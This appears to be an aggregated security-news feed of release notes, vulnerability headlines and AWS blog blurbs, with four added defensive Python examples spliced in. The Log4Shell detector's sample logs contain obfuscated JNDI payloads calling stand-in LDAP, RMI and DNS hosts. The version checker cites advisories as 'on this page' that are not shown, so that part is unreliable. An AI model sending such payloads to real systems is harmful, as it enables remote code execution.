The ClamAV 1.3.0 feature release is now stable! Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update; switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support. The release files are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub (Alpine-based images and Debian-based multi-arch images; the Docker images are built on release day and may not be available until later in the day). Continue reading to learn what changed in each version. 1.3.0: ClamAV 1.3.0 includes the following improvements and changes. Major changes: added support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate. You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: if you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build; all dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags: clamav/clamav:unstable, clamav/clamav:unstable_base, clamav/clamav-debian:unstable, clamav/clamav-debian:unstable_base. This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`. In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`. ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html
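The ClamAV Docker images above are most often run as a clamd service that other containers hand files to over TCP. As an added example (editor's code, not part of the ClamAV project), here is a minimal client for clamd's INSTREAM command, which streams the bytes to the daemon instead of requiring a shared filesystem path. The framing is clamd's own: the command "zINSTREAM" followed by a NUL byte (the z prefix asks for NUL-terminated replies), the payload as chunks each prefixed with a 4-byte big-endian length, and a zero-length chunk to finish; the daemon answers with "stream: OK" or "stream: <signature> FOUND". The host and port (clamd's default TCP port is 3310), the chunk size, the function names and the sample reply strings are this example's own.

```python
from __future__ import annotations
import socket
import struct

CHUNK = 8192  # chunk size is the client's choice; clamd only caps the total


def instream_frames(data: bytes, chunk: int = CHUNK):
    """Yield the exact bytes one INSTREAM session puts on the wire:
    command, length-prefixed chunks, zero-length terminator."""
    yield b"zINSTREAM\0"
    for offset in range(0, len(data), chunk):
        piece = data[offset:offset + chunk]
        yield struct.pack(">I", len(piece)) + piece
    yield struct.pack(">I", 0)


def parse_reply(raw: bytes) -> tuple[str, str | None]:
    """Map clamd's one-line reply to ("OK", None), ("FOUND", signature) or
    ("ERROR", message).  Anything that is not an explicit OK is treated as
    not-clean, so a size-limit refusal cannot pass for a clean verdict."""
    line = raw.rstrip(b"\0\n").decode("utf-8", "replace")
    verdict = line.split(": ", 1)[-1]        # drop the "stream" prefix if present
    if verdict == "OK":
        return "OK", None
    if verdict.endswith(" FOUND"):
        return "FOUND", verdict[: -len(" FOUND")]
    return "ERROR", verdict


def scan_bytes(data: bytes, host: str = "127.0.0.1", port: int = 3310,
               timeout: float = 30.0) -> tuple[str, str | None]:
    """Stream data to clamd and return the parsed verdict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for frame in instream_frames(data):
            sock.sendall(frame)
        reply = b""
        while not reply.endswith(b"\0"):    # z-commands end the reply with NUL
            part = sock.recv(4096)
            if not part:
                break
            reply += part
    return parse_reply(reply)


if __name__ == "__main__":
    import sys
    status, detail = scan_bytes(open(sys.argv[1], "rb").read())
    print(status, detail or "")
```

Against a daemon started with `docker run -d -p 3310:3310 clamav/clamav:stable` (image name taken from the tag family quoted in the entries above) the script scans the file named on the command line; the two protocol helpers run offline, which is where the framing and reply parsing should be checked. If a stream exceeds the daemon's StreamMaxLength, clamd closes it with an ERROR line rather than a verdict, and parse_reply reports that as "ERROR" instead of mistaking it for clean.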

Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html

An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html

ClamAV 1.3.0 release candidate now available!
The ClamAV 1.3.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: if you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc.tar.gz" does not require an internet connection to build; all dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2023/12/clamav-130-release-candidate-now.html

ClamAV 1.2.1, 1.1.3, 1.0.4, 0.103.11 patch versions published
Today, we are publishing the 1.2.1, 1.1.3, 1.0.4, and 0.103.11 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. Continue reading to learn what changed in each version. 1.2.1: ClamAV 1.2.1 is a patch release with the following fixes: eliminate security warning about unused "atty" dependency (GitHub pull request); upgrade the bundled UnRAR library (libclamunrar) to version 6.2.12 (GitHub pull request); build system: fix link error with Clang/LLVM/LLD version 17, patch courtesy of Yasuhiro Kimura (GitHub pull request); fix alert-exceeds-max feature for files > 2GB and < max-filesize (GitHub pull request). Special thanks to Yasuhiro Kimura for code contributions and bug reports. 1.1.3: ClamAV...
http://blog.clamav.net/2023/10/clamav-121-113-104-010311-patch.html

Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first. As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon. Update (2025-01-12): Added Lemmy endpoint which has been fixed by now. Also mentioned...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/

It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html

We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig

Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023

Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses

Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms

Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption

NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework

Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw

CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact

A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html

‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector

HTTP request smuggling bug patched in HAProxy
Exploitation could enable attackers to access backend servers
https://portswigger.net/daily-swig/http-request-smuggling-bug-patched-in-haproxy

Belgium launches nationwide safe harbor for ethical hackers
New legal protections for security researchers could be the strongest of any EU country
https://portswigger.net/daily-swig/belgium-launches-nationwide-safe-harbor-for-ethical-hackers

TikTok is a National Security Risk, Not A Privacy One
An analysis of the threat posed by TikTok and why we need to weigh our options carefully.
https://malwaretech.com/2022/12/tiktok-is-a-national-security-risk.html

Everything you need to know about the OpenSSL 3.0.7 Patch (CVE-2022-3602 & CVE-2022-3786)

https://malwaretech.com/2022/11/everything-you-need-to-know-about-the-openssl-3-0-7-patch.html

CVE-2022-3602 and CVE-2022-3786: OpenSSL 3.0.7 patches Critical Vulnerability
On Tuesday, November 1 2022, between 13:00 and 17:00 UTC, the OpenSSL project announced the release of OpenSSL 3.0.7, which patches a critical vulnerability in the OpenSSL 3.0 series. Only OpenSSL versions 3.0.0 through 3.0.6 are affected at the time of writing. At this moment the details of this [...]
https://www.hackingtutorials.org/general-tutorials/openssl-3-0-7-patches-critical-vulnerability/
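Three items on this page (the AWS Client VPN bulletin AWS-2024-008, the ClamAV 1.3.1/1.2.3/1.0.6 patch releases, and OpenSSL 3.0.7) each publish a different fixed version per platform or per release branch, which is exactly where fleet-inventory scripts go wrong: compared as strings, "3.9.2" sorts after "3.11.1", so the patched macOS client looks newer than an unpatched Windows one. The following is an added example (editor's code, not taken from any of the advisories) of a branch-aware version-floor check. The floors are copied from the advisories as quoted on this page; the product and platform keys, the function names and the sample version banners are this example's own. ClamAV 1.1 has no floor because the 1.3.0 release notes above declare it end-of-life, and a branch an advisory does not mention returns None rather than False so it is never misread as safe.

```python
from __future__ import annotations
import re

# Fixed versions copied from the advisories on this page; the product and
# platform keys are this example's own naming.  None marks a branch that is
# end-of-life: there is no fixed build to upgrade to on that branch.
FLOORS = {
    # AWS-2024-008 (CVE-2024-30164 / CVE-2024-30165): one floor per platform
    "aws-client-vpn": {"windows": "3.11.1", "macos": "3.9.2", "linux": "3.12.1"},
    # ClamAV April 2024 patch releases: one floor per release branch, 1.1 is EOL
    "clamav": {"1.3": "1.3.1", "1.2": "1.2.3", "1.0": "1.0.6", "1.1": None},
    # OpenSSL 3.0.7 (CVE-2022-3602 / CVE-2022-3786): only the 3.0 branch is affected
    "openssl": {"3.0": "3.0.7"},
}

_VERSION = re.compile(r"(\d+(?:\.\d+)+)")


def parse_version(text: str) -> tuple[int, ...]:
    """Pull the first dotted numeric version out of a string and return it as a
    tuple of ints, which Python compares field by field rather than lexically.
    Accepts raw strings ("3.0.7") and tool banners such as
    "OpenSSL 3.0.6 11 Oct 2022" or "ClamAV 1.3.0/27200/Tue Mar 19 08:32:36 2024"
    (the latter is the assumed shape of `clamscan --version` output)."""
    match = _VERSION.search(text)
    if match is None:
        raise ValueError(f"no version number in {text!r}")
    return tuple(int(part) for part in match.group(1).split("."))


def branch_of(version: tuple[int, ...]) -> str:
    """Release branch as "major.minor", the granularity the advisories use."""
    return f"{version[0]}.{version[1]}"


def needs_update(product: str, installed: str, platform: str | None = None) -> bool | None:
    """True  -> below the fixed version for its branch (or on an EOL branch)
    False -> at or above the fixed version
    None  -> the advisory lists no floor for this branch; check by hand and
             never treat None as "safe"."""
    floors = FLOORS[product]
    version = parse_version(installed)
    key = platform if platform is not None else branch_of(version)
    if key not in floors:
        return None
    floor = floors[key]
    if floor is None:            # EOL branch: nothing to upgrade to in-branch
        return True
    return version < parse_version(floor)


if __name__ == "__main__":
    # Constructed inventory rows: (product, platform or None, version banner)
    inventory = [
        ("aws-client-vpn", "macos", "3.9.2"),
        ("aws-client-vpn", "windows", "3.9.2"),
        ("clamav", None, "ClamAV 1.3.0/27200/Tue Mar 19 08:32:36 2024"),
        ("clamav", None, "1.1.3"),
        ("openssl", None, "OpenSSL 3.0.6 11 Oct 2022"),
        ("openssl", None, "OpenSSL 1.1.1w 11 Sep 2023"),
    ]
    for product, platform, banner in inventory:
        print(product, platform or branch_of(parse_version(banner)), banner,
              "->", needs_update(product, banner, platform))
```

The tri-state return is the point: a scanner that answers False for every version it has no rule for will quietly bless an unsupported 0.103.x ClamAV or a 1.1.1 OpenSSL that the advisory simply did not talk about.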

Student Loan Breach Exposes 2.5M Records
2.5 million people were affected, in a breach that could spell more trouble down the line.
https://threatpost.com/student-loan-breach-exposes-2-5m-records/180492/

Watering Hole Attacks Push ScanBox Keylogger
Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.
https://threatpost.com/watering-hole-attacks-push-scanbox-keylogger/180490/

Tentacles of ‘0ktapus' Threat Group Victimize 130 Firms
Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.
https://threatpost.com/0ktapus-victimize-130-firms/180487/

Ransomware Attacks are on the Rise
Lockbit is by far this summer's most prolific ransomware group, trailed by two offshoots of the Conti group.
https://threatpost.com/ransomware-attacks-are-on-the-rise/180481/

Cybercriminals Are Selling Access to Chinese Surveillance Cameras
Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.
https://threatpost.com/cybercriminals-are-selling-access-to-chinese-surveillance-cameras/180478/

Twitter Whistleblower Complaint: The TL;DR Version
Twitter is blasted for security and privacy lapses by the company's former head of security who alleges the social media giant's actions amount to a national security risk.
https://threatpost.com/twitter-whistleblower-tldr-version/180472/

Firewall Bug Under Active Attack Triggers CISA Warning
CISA is warning that Palo Alto Networks' PAN-OS is under active attack and needs to be patched ASAP.
https://threatpost.com/firewall-bug-under-active-attack-cisa-warning/180467/

Fake Reservation Links Prey on Weary Travelers
Fake travel reservations are exacting more pain from the travel-weary, who are already dealing with the misery of canceled flights and overbooked hotels.
https://threatpost.com/reservation-links-prey-on-travelers/180462/

iPhone Users Urged to Update to Patch 2 Zero-Days
Separate fixes for macOS and iOS patch flaws in the kernel and in WebKit that are under active attack and can allow threat actors to take over devices.
https://threatpost.com/iphone-users-urged-to-update-to-patch-2-zero-days-under-attack/180448/

Google Patches Chrome's Fifth Zero-Day of the Year
An insufficient input validation flaw, one of 11 patched in an update this week, could allow arbitrary code execution and is under active attack.
https://threatpost.com/google-patches-chromes-fifth-zero-day-of-the-year/180432/

[Video] Introduction to Use-After-Free Vulnerabilities | UserAfterFree Challenge Walkthrough (Part: 1)

https://malwaretech.com/2022/05/video-introduction-to-use-after-free-vulnerabilities-userafterfree-challenge-walkthrough-part-1.html

[Video] Exploiting Windows RPC – CVE-2022-26809 Explained | Patch Analysis

https://malwaretech.com/2022/04/video-exploiting-windows-rpc-cve-2022-26809-explained-patch-analysis.html

Installing Rogue-jndi on Kali Linux
Following the previous tutorial, in which we looked at the Log4j vulnerability in VMware vSphere server, I got some questions about how to set up a malicious LDAP server on Linux. The attacker-controlled LDAP server is required to provide the malicious Java class (with a reverse shell, for example) in response to the forged [...]
https://www.hackingtutorials.org/general-tutorials/installing-rogue-jndi-on-kali-linux/

Log4Shell VMware vCenter Server (CVE-2021-44228)
Log4Shell is a critical vulnerability with the highest possible CVSSv3 score of 10.0 that affects thousands of products running Apache Log4j and leaves millions of targets potentially vulnerable. CVE-2021-44228 affects Log4j versions 2.0-beta9 to 2.14.1. Log4j is an incredibly popular logging library used in many different products and various Apache frameworks like Struts2, Kafka, and [...]
https://www.hackingtutorials.org/exploit-tutorials/log4shell-vmware-vcenter-server-cve-2021-44228/
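
The two Hacking Tutorials entries above describe the attack side of CVE-2021-44228: a forged `${jndi:...}` lookup that makes Log4j fetch a class from an attacker-run LDAP server. The detection side is what a defender reading those posts will want next, so here is an added example (not code from either tutorial) that finds JNDI lookups in web-server log lines, including the `${lower:j}` and `${::-j}` wrapper tricks used to evade naive string matching. The log lines in `SAMPLE_LINES` are constructed, and the IP addresses are documentation ranges.

```python
"""Spot Log4Shell (CVE-2021-44228) JNDI lookups in web-server log lines.

Added example, not code from the Hacking Tutorials posts. SAMPLE_LINES is a
constructed set of access-log lines in the common log format.
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Log4j lookup wrappers attackers use to hide the literal "jndi" token:
#   ${lower:J}   ${upper:n}   ${::-d}   ${env:UNSET:-i}
# They are rewritten innermost-first until the string stops changing.
_WRAPPER = re.compile(
    r"\$\{"
    r"(?:(?P<conv>lower|upper):(?P<val>[^${}]*)"      # ${lower:X} / ${upper:X}
    r"|(?P<name>[^${}]*):-(?P<fallback>[^${}]*)"       # ${name:-fallback}
    r")\}",
    re.IGNORECASE,
)

# Once unwrapped, every variant reads ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(?P<scheme>[a-z]+)\s*:", re.IGNORECASE)


def _unwrap_once(m) -> str:
    if m.group("conv"):
        val = m.group("val")
        return val.lower() if m.group("conv").lower() == "lower" else val.upper()
    # ${anything:-X} evaluates to X when "anything" is not defined
    return m.group("fallback")


def normalize(s: str, max_rounds: int = 20) -> str:
    """Percent-decode, then collapse nested lookup wrappers.
    The round limit keeps a pathological input from spinning the detector."""
    s = unquote(s)
    for _ in range(max_rounds):
        new = _WRAPPER.sub(_unwrap_once, s)
        if new == s:
            break
        s = new
    return s


def find_jndi(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, ldaps, rmi, dns, iiop, ...) carried by
    the line, or None if there is no lookup."""
    m = _JNDI.search(normalize(line))
    return m.group("scheme").lower() if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """(line index, scheme) for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        scheme = find_jndi(line)
        if scheme:
            hits.append((i, scheme))
    return hits


# Constructed sample: one benign request, then four payload variants
# (plain, lower:-wrapped, ::- wrapped, percent-encoded in the query string).
SAMPLE_LINES = [
    '203.0.113.7 - - [10/Dec/2021:14:02:11 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:14:02:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:16 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.5:1099/b}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:17 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.5/c}"',
    '203.0.113.9 - - [10/Dec/2021:14:02:18 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fexfil.example%2Fd%7D HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for idx, scheme in scan(SAMPLE_LINES):
        print(f"line {idx}: jndi lookup via {scheme}")
```

A `dns` scheme hit is worth treating as seriously as `ldap`: it is the variant used to confirm that a target is vulnerable before the LDAP stage described in the Rogue-jndi post is attempted. Real log pipelines also need base64-encoded and double-encoded variants, which this detector does not unwrap.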

How to customize behavior of AWS Managed Rules for AWS WAF
AWS Managed Rules for AWS WAF provides a group of rules created by AWS that can be used to help protect you against common application vulnerabilities and other unwanted access to your systems without having to write your own rules. The AWS Threat Research Team updates AWS Managed Rules to respond to an ever-changing threat landscape in order […]
https://aws.amazon.com/blogs/security/how-to-customize-behavior-of-aws-managed-rules-for-aws-waf/

The Great Leak: Microsoft Exchange AutoDiscover Design Flaw
Recently a "design flaw" in Microsoft Exchange's Autodiscover protocol was discovered by researchers that allowed access to 372,072 Windows domain credentials and 96,671 unique sets of credentials from applications such as Microsoft Outlook and third-party email clients. According to Amit Serper, the person who discovered the flaw, the source of the leak is [...]
https://www.hackingtutorials.org/pentesting-exchange/the-great-leak-microsoft-exchange-autodiscover-design-flaw/

The three most important AWS WAF rate-based rules
In this post, we explain what the three most important AWS WAF rate-based rules are for proactively protecting your web applications against common HTTP flood events, and how to implement these rules. We share what the Shield Response Team (SRT) has learned from helping customers respond to HTTP floods and show how all AWS WAF […]
https://aws.amazon.com/blogs/security/three-most-important-aws-waf-rate-based-rules/

Automatically update AWS WAF IP sets with AWS IP ranges
Note: This blog post describes how to automatically update AWS WAF IP sets with the most recent AWS IP ranges for AWS services. This related blog post describes how to perform a similar update for Amazon CloudFront IP ranges that are used in VPC Security Groups. You can use AWS Managed Rules for AWS WAF […]
https://aws.amazon.com/blogs/security/automatically-update-aws-waf-ip-sets-with-aws-ip-ranges/
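
The entry above is about keeping AWS WAF IP sets in sync with the published AWS IP ranges. The two details a practitioner trips over are that WAF IP sets are typed (an IPv4 set cannot hold IPv6 prefixes, so the feed has to be split into two sets) and that `UpdateIPSet` is a full replacement guarded by a `LockToken` from `GetIPSet`. The following is an added example, not the AWS blog post's own solution: `SAMPLE_IP_RANGES` is a constructed excerpt in the schema of the real `ip-ranges.json`, and `push_ip_set` assumes a boto3 `wafv2` client and an IP set that already exists.

```python
"""Build AWS WAF IP-set address lists from AWS's published ip-ranges.json.

Added example, not the AWS blog post's own code. SAMPLE_IP_RANGES is a
constructed excerpt in the real file's schema (https://ip-ranges.amazonaws.com/ip-ranges.json).
"""
import ipaddress
import json
from typing import Iterable, List, Optional, Tuple

SAMPLE_IP_RANGES = json.dumps({
    "syncToken": "1700000000",
    "createDate": "2023-11-14-00-00-00",
    "prefixes": [
        {"ip_prefix": "13.32.0.0/15", "region": "GLOBAL", "service": "CLOUDFRONT", "network_border_group": "GLOBAL"},
        {"ip_prefix": "52.46.0.0/18", "region": "GLOBAL", "service": "CLOUDFRONT", "network_border_group": "GLOBAL"},
        {"ip_prefix": "52.46.0.0/18", "region": "GLOBAL", "service": "AMAZON", "network_border_group": "GLOBAL"},
        {"ip_prefix": "3.5.140.0/22", "region": "ap-northeast-2", "service": "S3", "network_border_group": "ap-northeast-2"},
    ],
    "ipv6_prefixes": [
        {"ipv6_prefix": "2600:9000:4000::/36", "region": "GLOBAL", "service": "CLOUDFRONT", "network_border_group": "GLOBAL"},
        {"ipv6_prefix": "2600:9000:4000::/36", "region": "GLOBAL", "service": "AMAZON", "network_border_group": "GLOBAL"},
    ],
})


def select_prefixes(doc: str, service: str,
                    regions: Optional[Iterable[str]] = None) -> Tuple[List[str], List[str]]:
    """Return (ipv4_cidrs, ipv6_cidrs) for one service, deduplicated and sorted.

    regions=None keeps every region; pass {"GLOBAL"} or {"eu-west-1"} to narrow.
    The split matters because a WAF IP set is created as IPV4 or IPV6, never both.
    """
    data = json.loads(doc)
    wanted = set(regions) if regions is not None else None

    def keep(entry: dict) -> bool:
        return entry["service"] == service and (wanted is None or entry["region"] in wanted)

    # ip_network() validates each CIDR, so a malformed entry raises here rather
    # than being pushed into the firewall policy.
    v4 = {ipaddress.ip_network(e["ip_prefix"]) for e in data["prefixes"] if keep(e)}
    v6 = {ipaddress.ip_network(e["ipv6_prefix"]) for e in data["ipv6_prefixes"] if keep(e)}
    return [str(n) for n in sorted(v4)], [str(n) for n in sorted(v6)]


def push_ip_set(wafv2, name: str, ip_set_id: str, scope: str, addresses: List[str]) -> dict:
    """Replace the contents of an existing WAF IP set.

    Assumes `wafv2` is a boto3 client for the wafv2 API. UpdateIPSet replaces
    the whole address list and requires the LockToken returned by GetIPSet, so
    a concurrent edit makes the call fail instead of silently overwriting it.
    """
    current = wafv2.get_ip_set(Name=name, Scope=scope, Id=ip_set_id)
    return wafv2.update_ip_set(
        Name=name,
        Scope=scope,          # "CLOUDFRONT" or "REGIONAL"
        Id=ip_set_id,
        Addresses=addresses,
        LockToken=current["LockToken"],
    )


if __name__ == "__main__":
    v4, v6 = select_prefixes(SAMPLE_IP_RANGES, "CLOUDFRONT")
    print("IPv4 set:", v4)
    print("IPv6 set:", v6)
```

In production the document would be fetched from the AWS URL and the `syncToken` compared with the last applied one before calling `push_ip_set`, so that an unchanged feed does not generate a no-op update on every run.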

AWS Shield threat landscape review: 2020 year-in-review
AWS Shield is a managed service that protects applications that are running on Amazon Web Services (AWS) against external threats, such as bots and distributed denial of service (DDoS) attacks. Shield detects network and web application-layer volumetric events that may indicate a DDoS attack, web content scraping, or other unauthorized non-human traffic that is interacting […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-review-2020-year-in-review/

How to protect a self-managed DNS service against DDoS attacks using AWS Global Accelerator and AWS Shield Advanced
In this blog post, I show you how to improve the distributed denial of service (DDoS) resilience of your self-managed Domain Name System (DNS) service by using AWS Global Accelerator and AWS Shield Advanced. You can use those services to incorporate some of the techniques used by Amazon Route 53 to protect against DDoS attacks. […]
https://aws.amazon.com/blogs/security/how-to-protect-a-self-managed-dns-service-against-ddos-attacks-using-aws-global-accelerator-and-aws-shield-advanced/

Set up centralized monitoring for DDoS events and auto-remediate noncompliant resources
When you build applications on Amazon Web Services (AWS), it's a common security practice to isolate production resources from non-production resources by logically grouping them into functional units or organizational units. There are many benefits to this approach, such as making it easier to implement the principle of least privilege, or reducing the scope of […]
https://aws.amazon.com/blogs/security/set-up-centralized-monitoring-for-ddos-events-and-auto-remediate-noncompliant-resources/

Deploying defense in depth using AWS Managed Rules for AWS WAF (part 2)
In this post, I show you how to use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. In part 1 of this post I describe the technologies […]
https://aws.amazon.com/blogs/security/deploying-defense-in-depth-using-aws-managed-rules-for-aws-waf-part-2/

Defense in depth using AWS Managed Rules for AWS WAF (part 1)
In this post, I discuss how you can use recent enhancements in AWS WAF to manage a multi-layer web application security enforcement policy. These enhancements will help you to maintain and deploy web application firewall configurations across deployment stages and across different types of applications. The post is in two parts. This first part describes […]
https://aws.amazon.com/blogs/security/defense-in-depth-using-aws-managed-rules-for-aws-waf-part-1/

Houston consulate one of worst offenders in Chinese espionage, say U.S. officials
Credits: Reuters. The United States ordered the consulate closed this week, leading China to retaliate on Friday by telling the United States to shut its consulate in the city of Chengdu, as relations between the world's two largest economies […]
http://blog.extremehacking.org/blog/2020/07/24/houston-consulate-one-of-worst-offenders-in-chinese-espionage-say-u-s-officials/

Shocked I am. Shocked to find that underground bank-card-trading forums are full of liars, cheats, small-time grifters
Credits: The Register. The denizens of online forums dedicated to trading in stolen credit cards have been shown to be wretched hives of scum and villainy. This not-so-surprising news comes this week via academics at Washington State University (WSU) in the US, […]
http://blog.extremehacking.org/blog/2020/07/24/shocked-i-am-shocked-to-find-that-underground-bank-card-trading-forums-are-full-of-liars-cheats-small-time-grifters/

AWS Shield Threat Landscape report is now available
AWS Shield is a managed threat protection service that safeguards applications running on AWS against exploitation of application vulnerabilities, bad bots, and Distributed Denial of Service (DDoS) attacks. The AWS Shield Threat Landscape Report (TLR) provides you with a summary of threats detected by AWS Shield. This report is curated by the AWS Threat Research […]
https://aws.amazon.com/blogs/security/aws-shield-threat-landscape-report-now-available/

Vint Cerf suggests GDPR could hurt coronavirus vaccine development
Credits: The Register. TCP/IP co-developer Vint Cerf, revered as a critical contributor to the foundations of the internet, has floated the notion that privacy legislation might hinder the development of a vaccination for the COVID-19 coronavirus. In an essay written for […]
http://blog.extremehacking.org/blog/2020/05/16/vint-cerf-suggests-gdpr-could-hurt-coronavirus-vaccine-development/

Brit defense contractor hacked, up to 100,000 past and present employees' details siphoned off – report
Credits: The Register. Britain's Ministry of Defence contractor Interserve has been hacked, reportedly leaking the details of up to 100,000 past and current employees, including payment information and details of their next of kin. The Daily Telegraph reports that up to […]
http://blog.extremehacking.org/blog/2020/05/16/brit-defense-contractor-hacked-up-to-100000-past-and-present-employees-details-siphoned-off-report/

US officially warns China is launching cyberattacks to steal coronavirus research
Credits: CNN. The US Department of Homeland Security and the FBI issued a "public service announcement" Wednesday warning that China is likely launching cyberattacks to steal coronavirus data related to vaccines and treatments from US research institutions and pharmaceutical […]
http://blog.extremehacking.org/blog/2020/05/14/us-officially-warns-china-is-launching-cyberattacks-to-steal-coronavirus-research/

There's Norway you're going to believe this: World's largest sovereign wealth fund conned out of $10m in cyber-attack
Credits: The Register. The Norwegian Investment Fund has been swindled out of $10m (£8.2m) by fraudsters who pulled off what's been described as "an advance data breach." Norfund – the world's largest sovereign wealth fund, created from saved North Sea […]
http://blog.extremehacking.org/blog/2020/05/14/theres-norway-youre-going-to-believe-this-worlds-largest-sovereign-wealth-fund-conned-out-of-10m-in-cyber-attack/

Stop tracking me, Google: Austrian citizen files GDPR legal complaint over Android Advertising ID
Credits: The Register. Privacy pressure group Noyb has filed a legal complaint against Google on behalf of an Austrian citizen, claiming the Android Advertising ID on every Android device is "personal data" as defined by the EU's GDPR and that […]
http://blog.extremehacking.org/blog/2020/05/14/stop-tracking-me-google-austrian-citizen-files-gdpr-legal-complaint-over-android-advertising-id/

Cyber-attacks hit hospital construction companies
